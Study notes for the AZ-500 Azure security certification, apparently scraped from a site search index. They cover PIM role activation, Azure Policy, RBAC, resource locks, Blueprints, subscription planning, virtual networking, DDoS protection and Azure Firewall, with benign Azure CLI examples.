How is a role activated? If users have been made eligible for a role, they must activate the role assignment before using the role. To activate the role, users select a specific activation duration within the maximum (configured by administrators) and give the reason for the activation request. If the role requires approval to activate, a notification appears in the upper right corner of the user's browser, informing them the request is pending approval. If approval isn't required, the member can start using the role. Delegated approvers receive email notifications when a role request is pending their approval; approvers can view, approve, or deny these pending requests in PIM. After the request has been approved, the member can start using the role. For example, if a user or a group was assigned the Contributor role on a resource group, they'll be able to manage that particular resource group.

Extending or renewing assignments requires approval from a Global Administrator or Privileged Role Administrator. Notifications can be sent to admins, requestors, and approvers.
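A sketch of what self-activation looks like against Microsoft Graph, assuming an eligible assignment already exists; every ID and the timestamp are placeholders:

```bash
# Self-activate an eligible Azure AD role for 2 hours with a justification
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "<my-object-id>",
    "roleDefinitionId": "<role-definition-id>",
    "directoryScopeId": "/",
    "justification": "Investigating a support ticket",
    "scheduleInfo": {
      "startDateTime": "2024-06-08T16:00:00Z",
      "expiration": { "type": "afterDuration", "duration": "PT2H" }
    }
  }'
```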

        Privileged Role Administrator permissions

        • Enable approval for specific roles
        • Specify approver users or groups to approve requests
        • View request and approval history for all privileged roles

        Approver permissions

        • View pending approvals (requests)
        • Approve or reject requests for role elevation (single and bulk)
        • Provide justification for my approval or rejection

        Eligible role user permissions

        • Request activation of a role that requires approval
        • View the status of your request to activate
        • Complete your task in Azure AD if activation was approved

        Assignment settings:

        • Allow permanent eligible assignment. Global admins and Privileged role admins can assign permanent eligible assignment. They can also require that all eligible assignments have a specified start and end date.
• Allow permanent active assignment. Global admins and Privileged role admins can assign permanent active assignments. They can also require that all active assignments have a specified start and end date.

        Implement a privileged identity management workflow

        By configuring Azure AD PIM to manage our elevated access roles in Azure AD, we now have JIT access for more than 28 configurable privileged roles. We can also monitor access, audit account elevations, and receive additional alerts through a management dashboard in the Azure portal.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#5-design-an-enterprise-governance-strategy-azure-resource-manager","title":"5. Design an Enterprise Governance strategy: Azure Resource Manager","text":"

Regardless of the deployment type, you always retain responsibility for the following:

        • Data
        • Endpoints
        • Accounts
        • Access management

        Azure Resource Manager\u00a0is the deployment and management service for Azure. It provides a consistent management layer that allows you to create, update, and delete resources in your Azure subscription. You can use its access control, auditing, and tagging features to help secure and organize your resources after deployment.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#51-resource-groups","title":"5.1. Resource Groups","text":"

There are some important factors to consider when defining your resource group (a CLI sketch follows this list):

• All the resources in your group should share the same lifecycle: you deploy, update, and delete them together. If one resource, such as a database server, needs to exist on a different deployment cycle, it should be in another resource group.
        • Each resource can only exist in one resource group.
        • You can add or remove a resource to a resource group at any time.
        • You can move a resource from one resource group to another group.
        • A resource group can contain resources that are located in different regions.
        • A resource group can be used to scope access control for administrative actions.
        • A resource can interact with resources in other resource groups. This interaction is common when the two resources are related but don't share the same lifecycle (for example, web apps connecting to a database).
        • If the resource group's region is temporarily unavailable, you can't update resources in the resource group because the metadata is unavailable. The resources in other regions will still function as expected, but you can't update them.
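
        As a quick illustration of these factors, creating a group and moving a resource between groups looks like this in Azure CLI; the group names and the resource ID below are hypothetical placeholders.

        az group create --name rg-demo --location westeurope

        # Move a resource to another resource group (its resource group changes, its region does not)
        az resource move \
          --destination-group rg-target \
          --ids "/subscriptions/<subscription-id>/resourceGroups/rg-demo/providers/Microsoft.Storage/storageAccounts/stdemo001"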
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#52-management-groups","title":"5.2. Management Groups","text":"
        • Provide user access to multiple subscriptions
        • Allows for new organizational models and logically grouping of resources.
        • Allows for single assignment of controls that applies to all subscriptions.
        • Provides aggregated views above the subscription level.

        Mirror your organization's structure:

        • Create a flexible hierarchy that can be updated quickly.
        • The hierarchy does not need to model the organization's billing hierarchy.
        • The structure can easily scale up or down depending on your needs.

        Apply policies or access controls to any service:

        • Create one RBAC assignment on the management group, which will inherit that access to all the subscriptions.
        • Use Azure Resource Manager integrations that allow integrations with other Azure services: Azure Cost Management, Privileged Identity Management, and Microsoft Defender for Cloud.
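
        A hypothetical Azure CLI sketch of this grouping; the management group name and subscription ID are placeholders.

        # Create a management group and move a subscription under it
        az account management-group create --name mg-platform --display-name "Platform"
        az account management-group subscription add --name mg-platform --subscription "<subscription-id>"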

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#53-azure-policies","title":"5.3. Azure policies","text":"

        Configure Azure policies - Azure Policy is a service you use to create, assign, and manage policies. These policies enforce different rules and effects over your resources so that those resources stay compliant with your corporate standards and service level agreements.

        The\u00a0first pillar\u00a0is around\u00a0real-time enforcement and compliance assessment.

        The\u00a0second pillar\u00a0of policy is\u00a0applying policies at scale\u00a0by leveraging Management Groups. There also is the concept called\u00a0policy initiative\u00a0that allows you to group policies together so that you can view the aggregated compliance result. At the initiative level there's also a concept called exclusion where one can exclude either the child management group, subscription, resource group, or resources from the policy assignment.

        The\u00a0third pillar\u00a0of your policy is\u00a0remediation by leveraging a remediation policy\u00a0that will automatically remediate the non-compliant resource so that your environment always stays compliant. For existing resources, they will be flagged as non-compliant but they won't automatically be changed because there can be impact to the environment.

        Some built-in roles in Azure Policy resources:

        • Resource Policy Owner
        • Resource Policy Contributor
        • Resource Policy Reader

        There are two resource providers for Azure Policy operations (or permissions):

        • Microsoft.Authorization
        • Microsoft.PolicyInsights

        If a custom policy is needed, these are the steps (a minimal sketch follows the list):

        • Identify your business requirements
        • Map each requirement to an Azure resource property
        • Map the property to an alias
        • Determine which effect to use
        • Compose the policy definition
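
        As a minimal sketch of these steps, the hypothetical definition below maps the requirement "resources may only be deployed to approved regions" to the location property and the deny effect; the definition name, regions, and subscription ID are placeholders.

        # Compose and create the policy definition (rules passed inline)
        az policy definition create \
          --name allowed-locations-demo \
          --display-name "Allowed locations (demo)" \
          --mode All \
          --rules '{ "if": { "not": { "field": "location", "in": ["westeurope", "northeurope"] } }, "then": { "effect": "deny" } }'

        # Assign it at subscription scope
        az policy assignment create \
          --name allowed-locations-demo \
          --policy allowed-locations-demo \
          --scope "/subscriptions/<subscription-id>"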

        Let's do it:

        • Policy definition - Every policy definition has conditions under which it's enforced. It also has a defined effect that takes place if the conditions are met.
        • Policy assignment\u00a0- A policy definition that has been assigned to take place within a specific scope. This scope could range from a management group to an individual resource. The term scope refers to all the resources, resource groups, subscriptions, or management groups that the policy definition is assigned to.
        • Policy parameters\u00a0- They help simplify your policy management by reducing the number of policy definitions you must create. You can define parameters when creating a policy definition to make it more generic.

        In order to easily track compliance for multiple resources, create and assign an\u00a0Initiative definition.

        All Policy objects, including definitions, initiatives, and assignments, will be readable to all roles over its scope. For example, a Policy assignment scoped to an Azure subscription will be readable by all role holders at the subscription scope and below.

        A contributor may trigger resource remediation but can't create or update definitions and assignments. The User Access Administrator role is necessary to grant the managed identity used by deployIfNotExists or modify assignments the permissions it needs.
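
        When an assignment with a deployIfNotExists or modify effect has flagged non-compliant resources, a remediation task can be created. A minimal, hypothetical sketch (the assignment and group names are placeholders):

        az policy remediation create \
          --name remediate-demo \
          --policy-assignment "<assignment-name-or-id>" \
          --resource-group rg-demo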

        Each policy definition in Azure Policy has a single effect. That effect determines what happens when the policy rule is evaluated to match. The effects behave differently if they are for a new resource, an updated resource, or an existing resource.

        These effects are currently supported in a policy definition:

        • Append
        • Audit
        • AuditIfNotExists
        • Deny
        • DenyAction
        • DeployIfNotExists
        • Disabled
        • Manual
        • Modify
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#54-enable-role-based-access-control-rbac","title":"5.4. Enable Role-Based Access Control (RBAC)","text":"

        RBAC is an authorization system built on Azure Resource Manager that provides fine-grained access management of Azure resources. Each Azure subscription is associated with one Azure AD directory. Users, groups, and applications in that directory can manage resources in the Azure subscription. Grant access by assigning the appropriate RBAC role to users, groups, and applications at a certain scope. The scope of a role assignment can be a subscription, a resource group, or a single resource.

        Note that a subscription is associated with only one Azure AD tenant. Also note that a resource group can have multiple resources but is associated with only one subscription. Lastly, a resource can be bound to only one resource group.
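
        A minimal sketch of granting a built-in role at resource group scope with Azure CLI; the assignee and IDs are placeholders.

        az role assignment create \
          --assignee "user@contoso.com" \
          --role "Reader" \
          --scope "/subscriptions/<subscription-id>/resourceGroups/rg-demo"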

        The four general built-in roles are:

        • Contributor - Grants full access to manage all resources, but does not allow you to assign roles in Azure RBAC, manage assignments in Azure Blueprints, or share image galleries.
        • Owner - Grants full access to manage all resources, including the ability to assign roles in Azure RBAC.
        • Reader - View all resources, but does not allow you to make any changes.
        • User Access Administrator - Lets you manage user access to Azure resources.

        If the built-in roles for Azure resources don't meet the specific needs of your organization, you can create your own custom roles. Just like built-in roles, you can assign custom roles to users, groups, and service principals at management group, subscription, and resource group scopes.
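
        A hypothetical custom role definition via Azure CLI; the permissions shown are illustrative and the subscription ID in AssignableScopes is a placeholder.

        az role definition create --role-definition '{
          "Name": "Virtual Machine Operator (demo)",
          "Description": "Can read and restart virtual machines.",
          "Actions": [
            "Microsoft.Compute/virtualMachines/read",
            "Microsoft.Compute/virtualMachines/restart/action"
          ],
          "AssignableScopes": [ "/subscriptions/<subscription-id>" ]
        }'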

        Limits for custom roles:

        • Each directory can have up to\u00a05000\u00a0custom roles.
        • Azure Germany and Azure China 21Vianet can have up to 2000 custom roles for each directory.
        • You cannot set AssignableScopes to the root scope (\"/\").
        • You can only define one management group in AssignableScopes of a custom role. Adding a management group to AssignableScopes is currently in preview.
        • Custom roles with DataActions cannot be assigned at the management group scope.
        • Azure Resource Manager doesn't validate the management group's existence in the role definition's assignable scope.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#55-enable-resource-locks","title":"5.5. Enable resource locks","text":"

        You can set the lock level to\u00a0CanNotDelete or ReadOnly. In the portal, the locks are called\u00a0Delete and Read-only\u00a0respectively.

        • CanNotDelete\u00a0means authorized users can still read and modify a resource, but they can't delete the resource.
        • ReadOnly\u00a0means authorized users can read a resource, but they can't delete or update the resource. Applying this lock is similar to restricting all authorized users to the permissions granted by the Reader role.

        To create or delete management locks, you must have access to Microsoft.Authorization/* or Microsoft.Authorization/locks/* actions. Of the built-in roles, only Owner and User Access Administrator are granted those actions.
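
        A minimal sketch with Azure CLI; the lock, group, and resource names are placeholders.

        # Protect a whole resource group from deletion
        az lock create --name NoDelete --lock-type CanNotDelete --resource-group rg-demo

        # Make a single storage account read-only
        az lock create --name ReadOnlyStorage --lock-type ReadOnly --resource-group rg-demo \
          --resource-name stdemo001 --resource-type Microsoft.Storage/storageAccounts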

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#56-deploy-azure-blueprints","title":"5.6. Deploy Azure blueprints","text":"

        Blueprints are a declarative way to orchestrate the deployment of various resource templates and other artifacts, such as:

        • Role Assignments
        • Policy Assignments
        • Azure Resource Manager templates
        • Resource Groups

        The Azure Blueprints service is supported by the globally distributed Azure Cosmos DB. Blueprint objects are replicated in multiple Azure regions. This replication provides low latency, high availability, and consistent access to your blueprint objects, regardless of which region Blueprints deploys your resources to.

        The Azure Resource Manager template gets used for deployments of one or more Azure resources, but once those resources deploy, there's no active connection or relationship to the template. Blueprints save the relationship between the blueprint definition and the blueprint assignment. This connection supports improved tracking and auditing of deployments. Each blueprint can consist of zero or more Resource Manager template artifacts. This support means that previous efforts to develop and maintain a library of Resource Manager templates are reusable in Blueprints.

        Blueprint definition - A blueprint is composed of\u00a0artifacts. Azure Blueprints currently supports the following resources as artifacts:

        • Resource Groups (hierarchy options: Subscription) - Create a new resource group for use by other artifacts within the blueprint. These placeholder resource groups enable you to organize resources exactly how you want them structured and provide a scope limiter for included policy and role assignment artifacts and ARM templates.
        • ARM template (hierarchy options: Subscription, Resource Group) - Templates, including nested and linked templates, are used to compose complex environments. Example environments: a SharePoint farm, Azure Automation State Configuration, or a Log Analytics workspace.
        • Policy Assignment (hierarchy options: Subscription, Resource Group) - Allows assignment of a policy or initiative to the subscription the blueprint is assigned to. The policy or initiative must be within the scope of the blueprint definition location. If the policy or initiative has parameters, these parameters are assigned at the creation of the blueprint or during blueprint assignment.
        • Role Assignment (hierarchy options: Subscription, Resource Group) - Add an existing user or group to a built-in role to make sure the right people always have the right access to your resources. Role assignments can be defined for the entire subscription or nested to a specific resource group included in the blueprint.

        Blueprint definition locations - When creating a blueprint definition, you'll define where the blueprint is saved. Blueprints can be saved to a\u00a0management group\u00a0or\u00a0subscription\u00a0that you have\u00a0Contributor access\u00a0to. If the location is a management group, the blueprint is available to assign to any child subscription of that management group.

        Blueprint parameters - Blueprints can pass parameters to either a\u00a0policy/initiative\u00a0or an\u00a0ARM template. When adding either\u00a0artifact\u00a0to a blueprint, the author decides to provide a defined value for each blueprint assignment or to allow each blueprint assignment to provide a value at assignment time.

        Assigning a blueprint definition to a management group means the assignment object exists in the management group. The deployment of artifacts still targets a subscription. To perform a management group assignment, the\u00a0Create\u00a0Or\u00a0Update REST API\u00a0must be used, and the request body must include a value for\u00a0properties.scope\u00a0to define the target subscription.
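
        A heavily hedged sketch of such a management group assignment using the raw Blueprints REST API via az rest; the management group, blueprint name and version, and target subscription ID are all placeholders.

        az rest --method PUT \
          --url "https://management.azure.com/providers/Microsoft.Management/managementGroups/mg-platform/providers/Microsoft.Blueprint/blueprintAssignments/assign-demo?api-version=2018-11-01-preview" \
          --body '{
            "identity": { "type": "SystemAssigned" },
            "location": "westeurope",
            "properties": {
              "blueprintId": "/providers/Microsoft.Management/managementGroups/mg-platform/providers/Microsoft.Blueprint/blueprints/demo-blueprint/versions/v1",
              "scope": "/subscriptions/<target-subscription-id>"
            }
          }'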

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#57-design-an-azure-subscription-management-plan","title":"5.7. Design an Azure subscription management plan","text":"

        Capturing subscription requirements and designing target subscriptions include several factors which are based on:

        • environment type
        • ownership and governance model
        • organizational structure
        • application portfolios

        Organization and governance design considerations

        • Subscriptions serve as boundaries for Azure Policy assignments, for example, for workloads that must meet Payment Card Industry (PCI) compliance requirements.
        • Subscriptions serve as a scale unit so component workloads can scale within platform subscription limits.
        • Subscriptions provide a management boundary for governance and isolation that clearly separates concerns.
        • Create separate platform subscriptions for management (monitoring), connectivity, and identity when they're required.
        • Use manual processes to limit Azure AD tenants to only Enterprise Agreement enrollment subscriptions.
        • See the Azure subscription and reservation transfer hub for subscription transfers between Azure billing offers.

        Quota and capacity design considerations

        Azure regions might have a finite number of resources. As a result, available capacity and Stock-keeping units (SKUs) should be tracked for Azure adoptions involving a large number of resources.

        • Consider limits and quotas within the Azure platform for each service your workloads require.
        • Consider the availability of required SKUs within your chosen Azure regions.
        • Consider that subscription quotas aren't capacity guarantees and are applied on a per-region basis.
        • Consider reusing unused or decommissioned subscriptions.

        Tenant transfer restriction design considerations

        • Each Azure subscription is linked to a single Azure AD tenant, which acts as an identity provider (IdP) for your Azure subscription. The Azure AD tenant is used to authenticate users, services, and devices.
        • The Azure AD tenant linked to your Azure subscription can be changed by any user with the required permissions.

        Transferring to another Azure AD tenant is not supported for Azure Cloud Solution Provider (CSP) subscriptions.

        • With Azure landing zones, you can set requirements to prevent users from transferring subscriptions to your organization's Azure AD tenant.\u00a0Review the process in Manage Azure subscription policies. Configure your subscription policy by providing a list of exempted users. Exempted users are permitted to bypass restrictions set in the policy. An exempted users list is not an Azure Policy. You can only specify individual user accounts as exempted users, not Azure AD groups.
        • Consider whether users with Visual Studio/MSDN Azure subscriptions should be allowed to transfer their subscription to or from your Azure AD tenant.
        • Tenant transfer settings are only configurable by users with the Azure AD Global Administrator role assigned.

        • All users with access to Azure can view the policy defined for your Azure AD tenant.

          • Users can't view your exempted users list.
          • Users can view the global administrators within your Azure AD tenant.
        • Azure subscriptions transferred into an Azure AD tenant are placed into the default management group for that tenant.

        • If approved by your organization, your application team can define a process to allow Azure subscriptions to be transferred to or from an Azure AD tenant.

        Establish cost management design considerations

        • Cost transparency is a critical management challenge every large enterprise organization faces.
        • Shared platform as a service (PaaS) resources, like Azure App Service Environment and Azure Kubernetes Service, might need to be shared across teams to achieve higher density, which can affect chargeback models.
        • Use a shutdown schedule for nonproduction workloads to optimize costs.
        • Use Azure Advisor to check recommendations for optimizing costs.
        • Establish a chargeback model for better distribution of cost across your organization.
        • Implement policy to prevent the deployment of resources not authorized to be deployed in your organization's environment.
        • Establish a regular schedule and cadence to review cost and right size resources for workloads.

        Organization and governance recommendations

        • Treat subscriptions as a unit of management aligned with your business needs and priorities.
        • Make subscription owners aware of their roles and responsibilities.
          • Do a quarterly or yearly access review for Azure AD Privileged Identity Management to ensure that privileges don't proliferate as users move within your organization.
          • Take full ownership of budget spending and resources.
          • Ensure policy compliance and remediate when necessary.
        • Reference the following principles as you identify requirements for new subscriptions:
          • Scale limits: Subscriptions serve as a scale unit for component workloads to scale within platform subscription limits. Large specialized workloads like\u00a0high-performance computing,\u00a0Internet of Things (IoT), and\u00a0System Analysis Program Development (SAP)\u00a0should use separate subscriptions to avoid running up against these limits.
          • Management boundary: Subscriptions provide a management boundary for governance and isolation, allowing a clear separation of concerns. Different environments, such as development, test, and production, are often removed from a management perspective.
        • Policy boundary: Subscriptions serve as a boundary for Azure Policy assignments. For example, secure workloads like PCI typically require additional policies in order to achieve compliance. That additional overhead doesn't have to be applied everywhere if you use a separate subscription for such workloads. Development environments have more relaxed policy requirements than production environments.
          • Target network topology: You can't share virtual networks across subscriptions, but you can connect them with different technologies like\u00a0virtual network peering or\u00a0Azure ExpressRoute. When deciding if you need a new subscription, consider which workloads need to communicate with each other.
        • Group subscriptions together under management groups, which are aligned with your management group structure and policy requirements. Grouping subscriptions ensures that subscriptions with the same set of policies and Azure role assignments all come from a management group.
        • Establish a dedicated management subscription in your\u00a0Platform\u00a0management group to support global management capabilities like Azure Monitor Log Analytics workspaces and Azure Automation runbooks.
        • Establish a dedicated identity subscription in your\u00a0Platform\u00a0management group to host Windows Server Active Directory domain controllers when necessary.
        • Establish a dedicated connectivity subscription in your\u00a0Platform\u00a0management group to host an\u00a0Azure Virtual WAN hub,\u00a0private Domain Name System (DNS),\u00a0ExpressRoute circuit, and other networking resources. A dedicated subscription ensures that all your foundation network resources are billed together and isolated from other workloads.
        • Avoid a rigid subscription model. Instead, use a set of flexible criteria to group subscriptions across your organization.

        Quota and capacity recommendations

        • Use subscriptions as scale units, and scale out resources and subscriptions as required. Your workload can then use the required resources for scaling out without hitting subscription limits in the Azure platform.
        • Use reserved instances to manage capacity in some regions. Your workload can then have the required capacity for high demand resources in a specific region.
        • Establish a dashboard with custom views to monitor used capacity levels, and set up alerts if capacity is approaching critical levels (for example, 90 percent CPU usage).
        • Raise support requests for quota increases under subscription provisioning, such as for total available VM cores within a subscription (a sketch for checking current usage follows this list). Ensure that your quota limits are set before your workloads exceed the default limits.
        • Ensure that any required services and features are available within your chosen deployment regions.
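
        Current usage against regional quotas can be listed with Azure CLI, for example (the region is a placeholder):

        az vm list-usage --location westeurope --output table
        az network list-usages --location westeurope --output table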

        Automation recommendations

        • Build a Subscription vending process to automate the creation of Subscriptions for application teams via a request workflow as described in\u00a0Subscription vending.

        Tenant transfer restriction recommendations

        • Configure the following settings to prevent users from transferring Azure subscriptions to or from your Azure AD tenant:
          • Set Subscription leaving Azure AD directory to Permit no one.
          • Set Subscription entering Azure AD directory to Permit no one.
        • Configure a limited list of exempted users.
          • Include members from an Azure PlatformOps (platform operations) team.
          • Include break-glass accounts in the list of exempted users.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/","title":"II. Platform protection","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        This entire section is about implementing security with a defense-in-depth approach in mind.

        • Azure Network Security Groups\u00a0can be used for basic layer 3 & 4 access controls between Azure Virtual Networks, their subnets, and the Internet.
        • Application Security Groups\u00a0enable you to define fine-grained network security policies based on workloads, centralized on applications, instead of explicit IP addresses.
        • Azure Web Application Firewall\u00a0and the\u00a0Azure Firewall\u00a0can be used for more advanced network access controls that require application layer support.
        • Local Admin Password Solution (LAPS) or a third-party Privileged Access Management solution can set strong local admin passwords and provide just-in-time access to them.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#1-perimeter-security","title":"1. Perimeter security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#11-azure-networking-components","title":"1.1. Azure networking components","text":"

        Azure Virtual Networks are a key component of Azure security services. The Azure network infrastructure enables you to securely connect Azure resources to each other with virtual networks (VNets). A VNet is a representation of your own network in the cloud. A VNet is a logical isolation of the Azure cloud network dedicated to your subscription. You can connect VNets to your on-premises networks.

        Azure supports\u00a0dedicated WAN link connectivity\u00a0to your on-premises network and an Azure Virtual Network with ExpressRoute. The link between Azure and your site uses a dedicated connection that does not go over the public Internet.

        Virtual networks

        Virtual networks in Azure are network overlays that you can use to configure and control the connectivity among Azure resources, such as VMs and load balancers. A virtual network is scoped to a single Azure region. Virtual networks are made up of subnets. A subnet is a range of IP addresses within your virtual network. Subnets, like virtual networks, are scoped to a single Azure region. You can implement multiple virtual networks within each Azure subscription and Azure region. Each virtual network is isolated from other virtual networks. For each virtual network you can:

        • Specify a custom private IP address space using public and private addresses. Azure assigns resources in a virtual network a private IP address from the address space that you assign.
        • Segment the virtual network into one or more subnets and allocate a portion of the virtual network's address space to each subnet.
        • Use Azure-provided name resolution, or specify your own DNS server, for use by resources in a virtual network.
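
        A minimal sketch of creating a virtual network with one subnet; all names and address prefixes are placeholders.

        az network vnet create \
          --resource-group rg-net \
          --name vnet-hub \
          --address-prefixes 10.0.0.0/16 \
          --subnet-name snet-app \
          --subnet-prefixes 10.0.1.0/24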

        IP addresses

        VMs, Azure load balancers, and application gateways in a single virtual network require unique Internet Protocol (IP) addresses the same way that clients in an on-premises subnet do. This enables these resources to communicate with each other:

        • Private - A private IP address is dynamically or statically allocated to a VM from the defined scope of IP addresses in the virtual network. VMs use these addresses to communicate with other VMs in the same or connected virtual networks through a gateway / Azure ExpressRoute connection. These private IP addresses, or non-routable IP addresses, conform to RFC 1918.
        • Public - Public IP addresses, which allow Azure resources to communicate with external clients, are assigned directly at the virtual network adapter of the VM or to the load balancer. Public IP addresses can also be added to Azure-only virtual networks. All IP blocks in the virtual network will be routable only within the customer's network, and they won't be reachable from outside. Virtual network packets travel through the high-speed Azure backplane.

        You can control the dynamic IP addresses assigned to VMs and cloud services within an Azure virtual network by specifying an IP addressing scheme.

        Subnets

        Each subnet contains a range of IP addresses that fall within the virtual network address space. Subnetting hides the details of internal network organization from external routers. Subnetting also segments the host within the network, making it easier to apply network security at the interconnections between subnets.

        Network adapters

        VMs communicate with other VMs and other resources on the network by using virtual network adapters. Virtual network adapters configure VMs with private and, optionally, public IP address. A VM can have more than one network adapter for different network configurations.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#12-azure-distributed-denial-of-service-ddos-protection","title":"1.2. Azure Distributed Denial of Service (DDoS) Protection","text":"

        Best practices for building DDoS-resilient services in Azure:

        1. Ensure that security is a priority throughout the entire lifecycle of an application, from design and implementation to deployment and operations. Applications might have bugs that allow a relatively low volume of requests to use a lot of resources, resulting in a service outage.

        For this, take into account these pillars:

        • Scalability - The ability of a system to handle increased load.
        • Availability - The proportion of time that a system is functional and working.
        • Resiliency - The ability of a system to recover from failures and continue to function.
        • Management - Operations processes that keep a system running in production.
        • Security - Protecting applications and data from threats.

        2. Design your applications to scale horizontally to meet the demands of an amplified load\u2014specifically, in the event of a DDoS. If your application depends on a single instance of a service, it creates a single point of failure. Provisioning multiple instances makes your system more resilient and more scalable.

        For this, these are valid ways to address it:

        • For Azure App Service, select an App Service plan that offers multiple instances.
        • For Azure Cloud Services, configure each of your roles to use multiple instances.
        • For Azure Virtual Machines, ensure that your VM architecture includes more than one VM and that each VM is included in an availability set. We recommend using virtual machine scale sets for autoscaling capabilities.

        3. Layer security defenses in an application to reduce the chance of a successful attack. Implement security-enhanced designs for your applications by using the built-in capabilities of the Azure platform.

        This would be an approach to address it: be aware that the risk of attack increases with the size, or surface area, of the application. You can reduce the surface area by using IP allowlists to close down the exposed IP address space and listening ports that aren't needed on the load balancers (for Azure Load Balancer and Azure Application Gateway). You can also use NSGs to reduce the attack surface. You can use service tags and application security groups as a natural extension of an application's structure to minimize complexity for creating security rules and configuring network security.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#configure-a-distributed-denial-of-service-protection-implementation","title":"Configure a distributed denial of service protection implementation","text":"

        Azure Distributed Denial of Service (DDoS) protection, combined with application design best practices, provide defense against DDoS attacks. Azure DDoS protection provides the following service tiers:

        • Basic: Automatically enabled as part of the Azure platform. Always-on traffic monitoring, and real-time mitigation of common network-level attacks, provide the same defenses utilized by Microsoft's online services. The entire scale of Azure's global network can be used to distribute and mitigate attack traffic across regions. Protection is provided for IPv4 and IPv6 Azure public IP addresses.
        • Standard: Provides additional mitigation capabilities over the Basic service tier that are tuned specifically to Azure Virtual Network resources. DDoS Protection Standard is simple to enable, and requires no application changes. Protection policies are tuned through dedicated traffic monitoring and machine learning algorithms. Policies are applied to public IP addresses associated to resources deployed in virtual networks, such as Azure Load Balancer, Azure Application Gateway, and Azure Service Fabric instances, but this protection does not apply to App Service Environments. Real-time telemetry is available through Azure Monitor views during an attack, and for history. Rich attack mitigation analytics are available via diagnostic settings. Application layer protection can be added through the Azure Application Gateway Web Application Firewall or by installing a 3rd party firewall from Azure Marketplace. Protection is provided for IPv4 and IPv6 Azure public IP addresses.

        DDoS Protection Standard monitors actual traffic utilization and constantly compares it against the thresholds defined in the DDoS policy. When the traffic threshold is exceeded, DDoS mitigation is automatically initiated. When traffic returns to a level below the threshold, the mitigation is removed. During mitigation, DDoS Protection redirects traffic sent to the protected resource and performs several checks, including:

        • Helping ensure that packets conform to internet specifications and aren't malformed.
        • Interacting with the client to determine if the traffic might be a spoofed packet (for example, using SYN Auth or SYN Cookie, or dropping a packet for the source to retransmit it).
        • Rate-limiting packets if it can't perform any other enforcement method.

        DDoS Protection blocks attack traffic and forwards the remaining traffic to its intended destination. Within a few minutes of attack detection, you\u2019ll be notified with Azure Monitor metrics. By configuring logging on DDoS Protection Standard telemetry, you can write the logs to available options for future analysis. Azure Monitor retains metric data for DDoS Protection Standard for 30 days.
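
        A hypothetical sketch of enabling DDoS Protection Standard on a virtual network; plan, group, and VNet names are placeholders, and note that the plan is billed once created.

        az network ddos-protection create --resource-group rg-net --name ddos-plan
        az network vnet update \
          --resource-group rg-net \
          --name vnet-hub \
          --ddos-protection-plan ddos-plan \
          --ddos-protection true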

        DDoS Protection Standard can mitigate the following types of attacks:

        • Volumetric attacks: The attack's goal is to flood the network layer with a substantial amount of seemingly legitimate traffic. It includes UDP floods, amplification floods, and other spoofed-packet floods. DDoS Protection Standard mitigates these potential multi-gigabyte attacks by absorbing and scrubbing them, with Azure's global network scale, automatically.
        • Protocol attacks: These attacks render a target inaccessible, by exploiting a weakness in the layer 3 and layer 4 protocol stack. It includes, SYN flood attacks, reflection attacks, and other protocol attacks. DDoS Protection Standard mitigates these attacks, differentiating between malicious and legitimate traffic, by interacting with the client, and blocking malicious traffic.
        • Resource (application) layer attacks: These attacks target web application packets, to disrupt the transmission of data between hosts. The attacks include HTTP protocol violations, SQL injection, cross-site scripting, and other layer 7 attacks. Use a Web Application Firewall, such as the Azure Application Gateway web application firewall, as well as DDoS Protection Standard to provide defense against these attacks. There are also third-party web application firewall offerings available in the Azure Marketplace.

        DDoS Protection Standard protects resources in a virtual network including public IP addresses associated with virtual machines, load balancers, and application gateways. When coupled with the Application Gateway web application firewall, or a third-party web application firewall deployed in a virtual network with a public IP, DDoS Protection Standard can provide full layer 3 to layer 7 mitigation capability.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#13-azure-firewall","title":"1.3. Azure Firewall","text":"

        Azure Firewall\u00a0is a managed, cloud-based network security service that protects your Azure Virtual Network resources. It\u2019s a fully stateful firewall-as-a-service with built-in high availability and unrestricted cloud scalability. By default, Azure Firewall blocks traffic.

        • Built-in high availability\u00a0- Because high availability is built in, no additional load balancers are required and there\u2019s nothing you need to configure.
        • Unrestricted cloud scalability\u00a0- Azure Firewall can scale up as much as you need, to accommodate changing network traffic flows so you don't need to budget for your peak traffic.
        • Application Fully Qualified Domain Name (FQDN) filtering rules\u00a0- You can limit outbound HTTP/S traffic to a specified list of FQDNs, including wild cards. This feature does not require SSL termination.
        • Network traffic filtering rules\u00a0- You can centrally create allow or deny network filtering rules by source and destination IP address, port, and protocol. Azure Firewall is fully stateful, so it can distinguish legitimate packets for different types of connections. Rules are enforced and logged across multiple subscriptions and virtual networks.
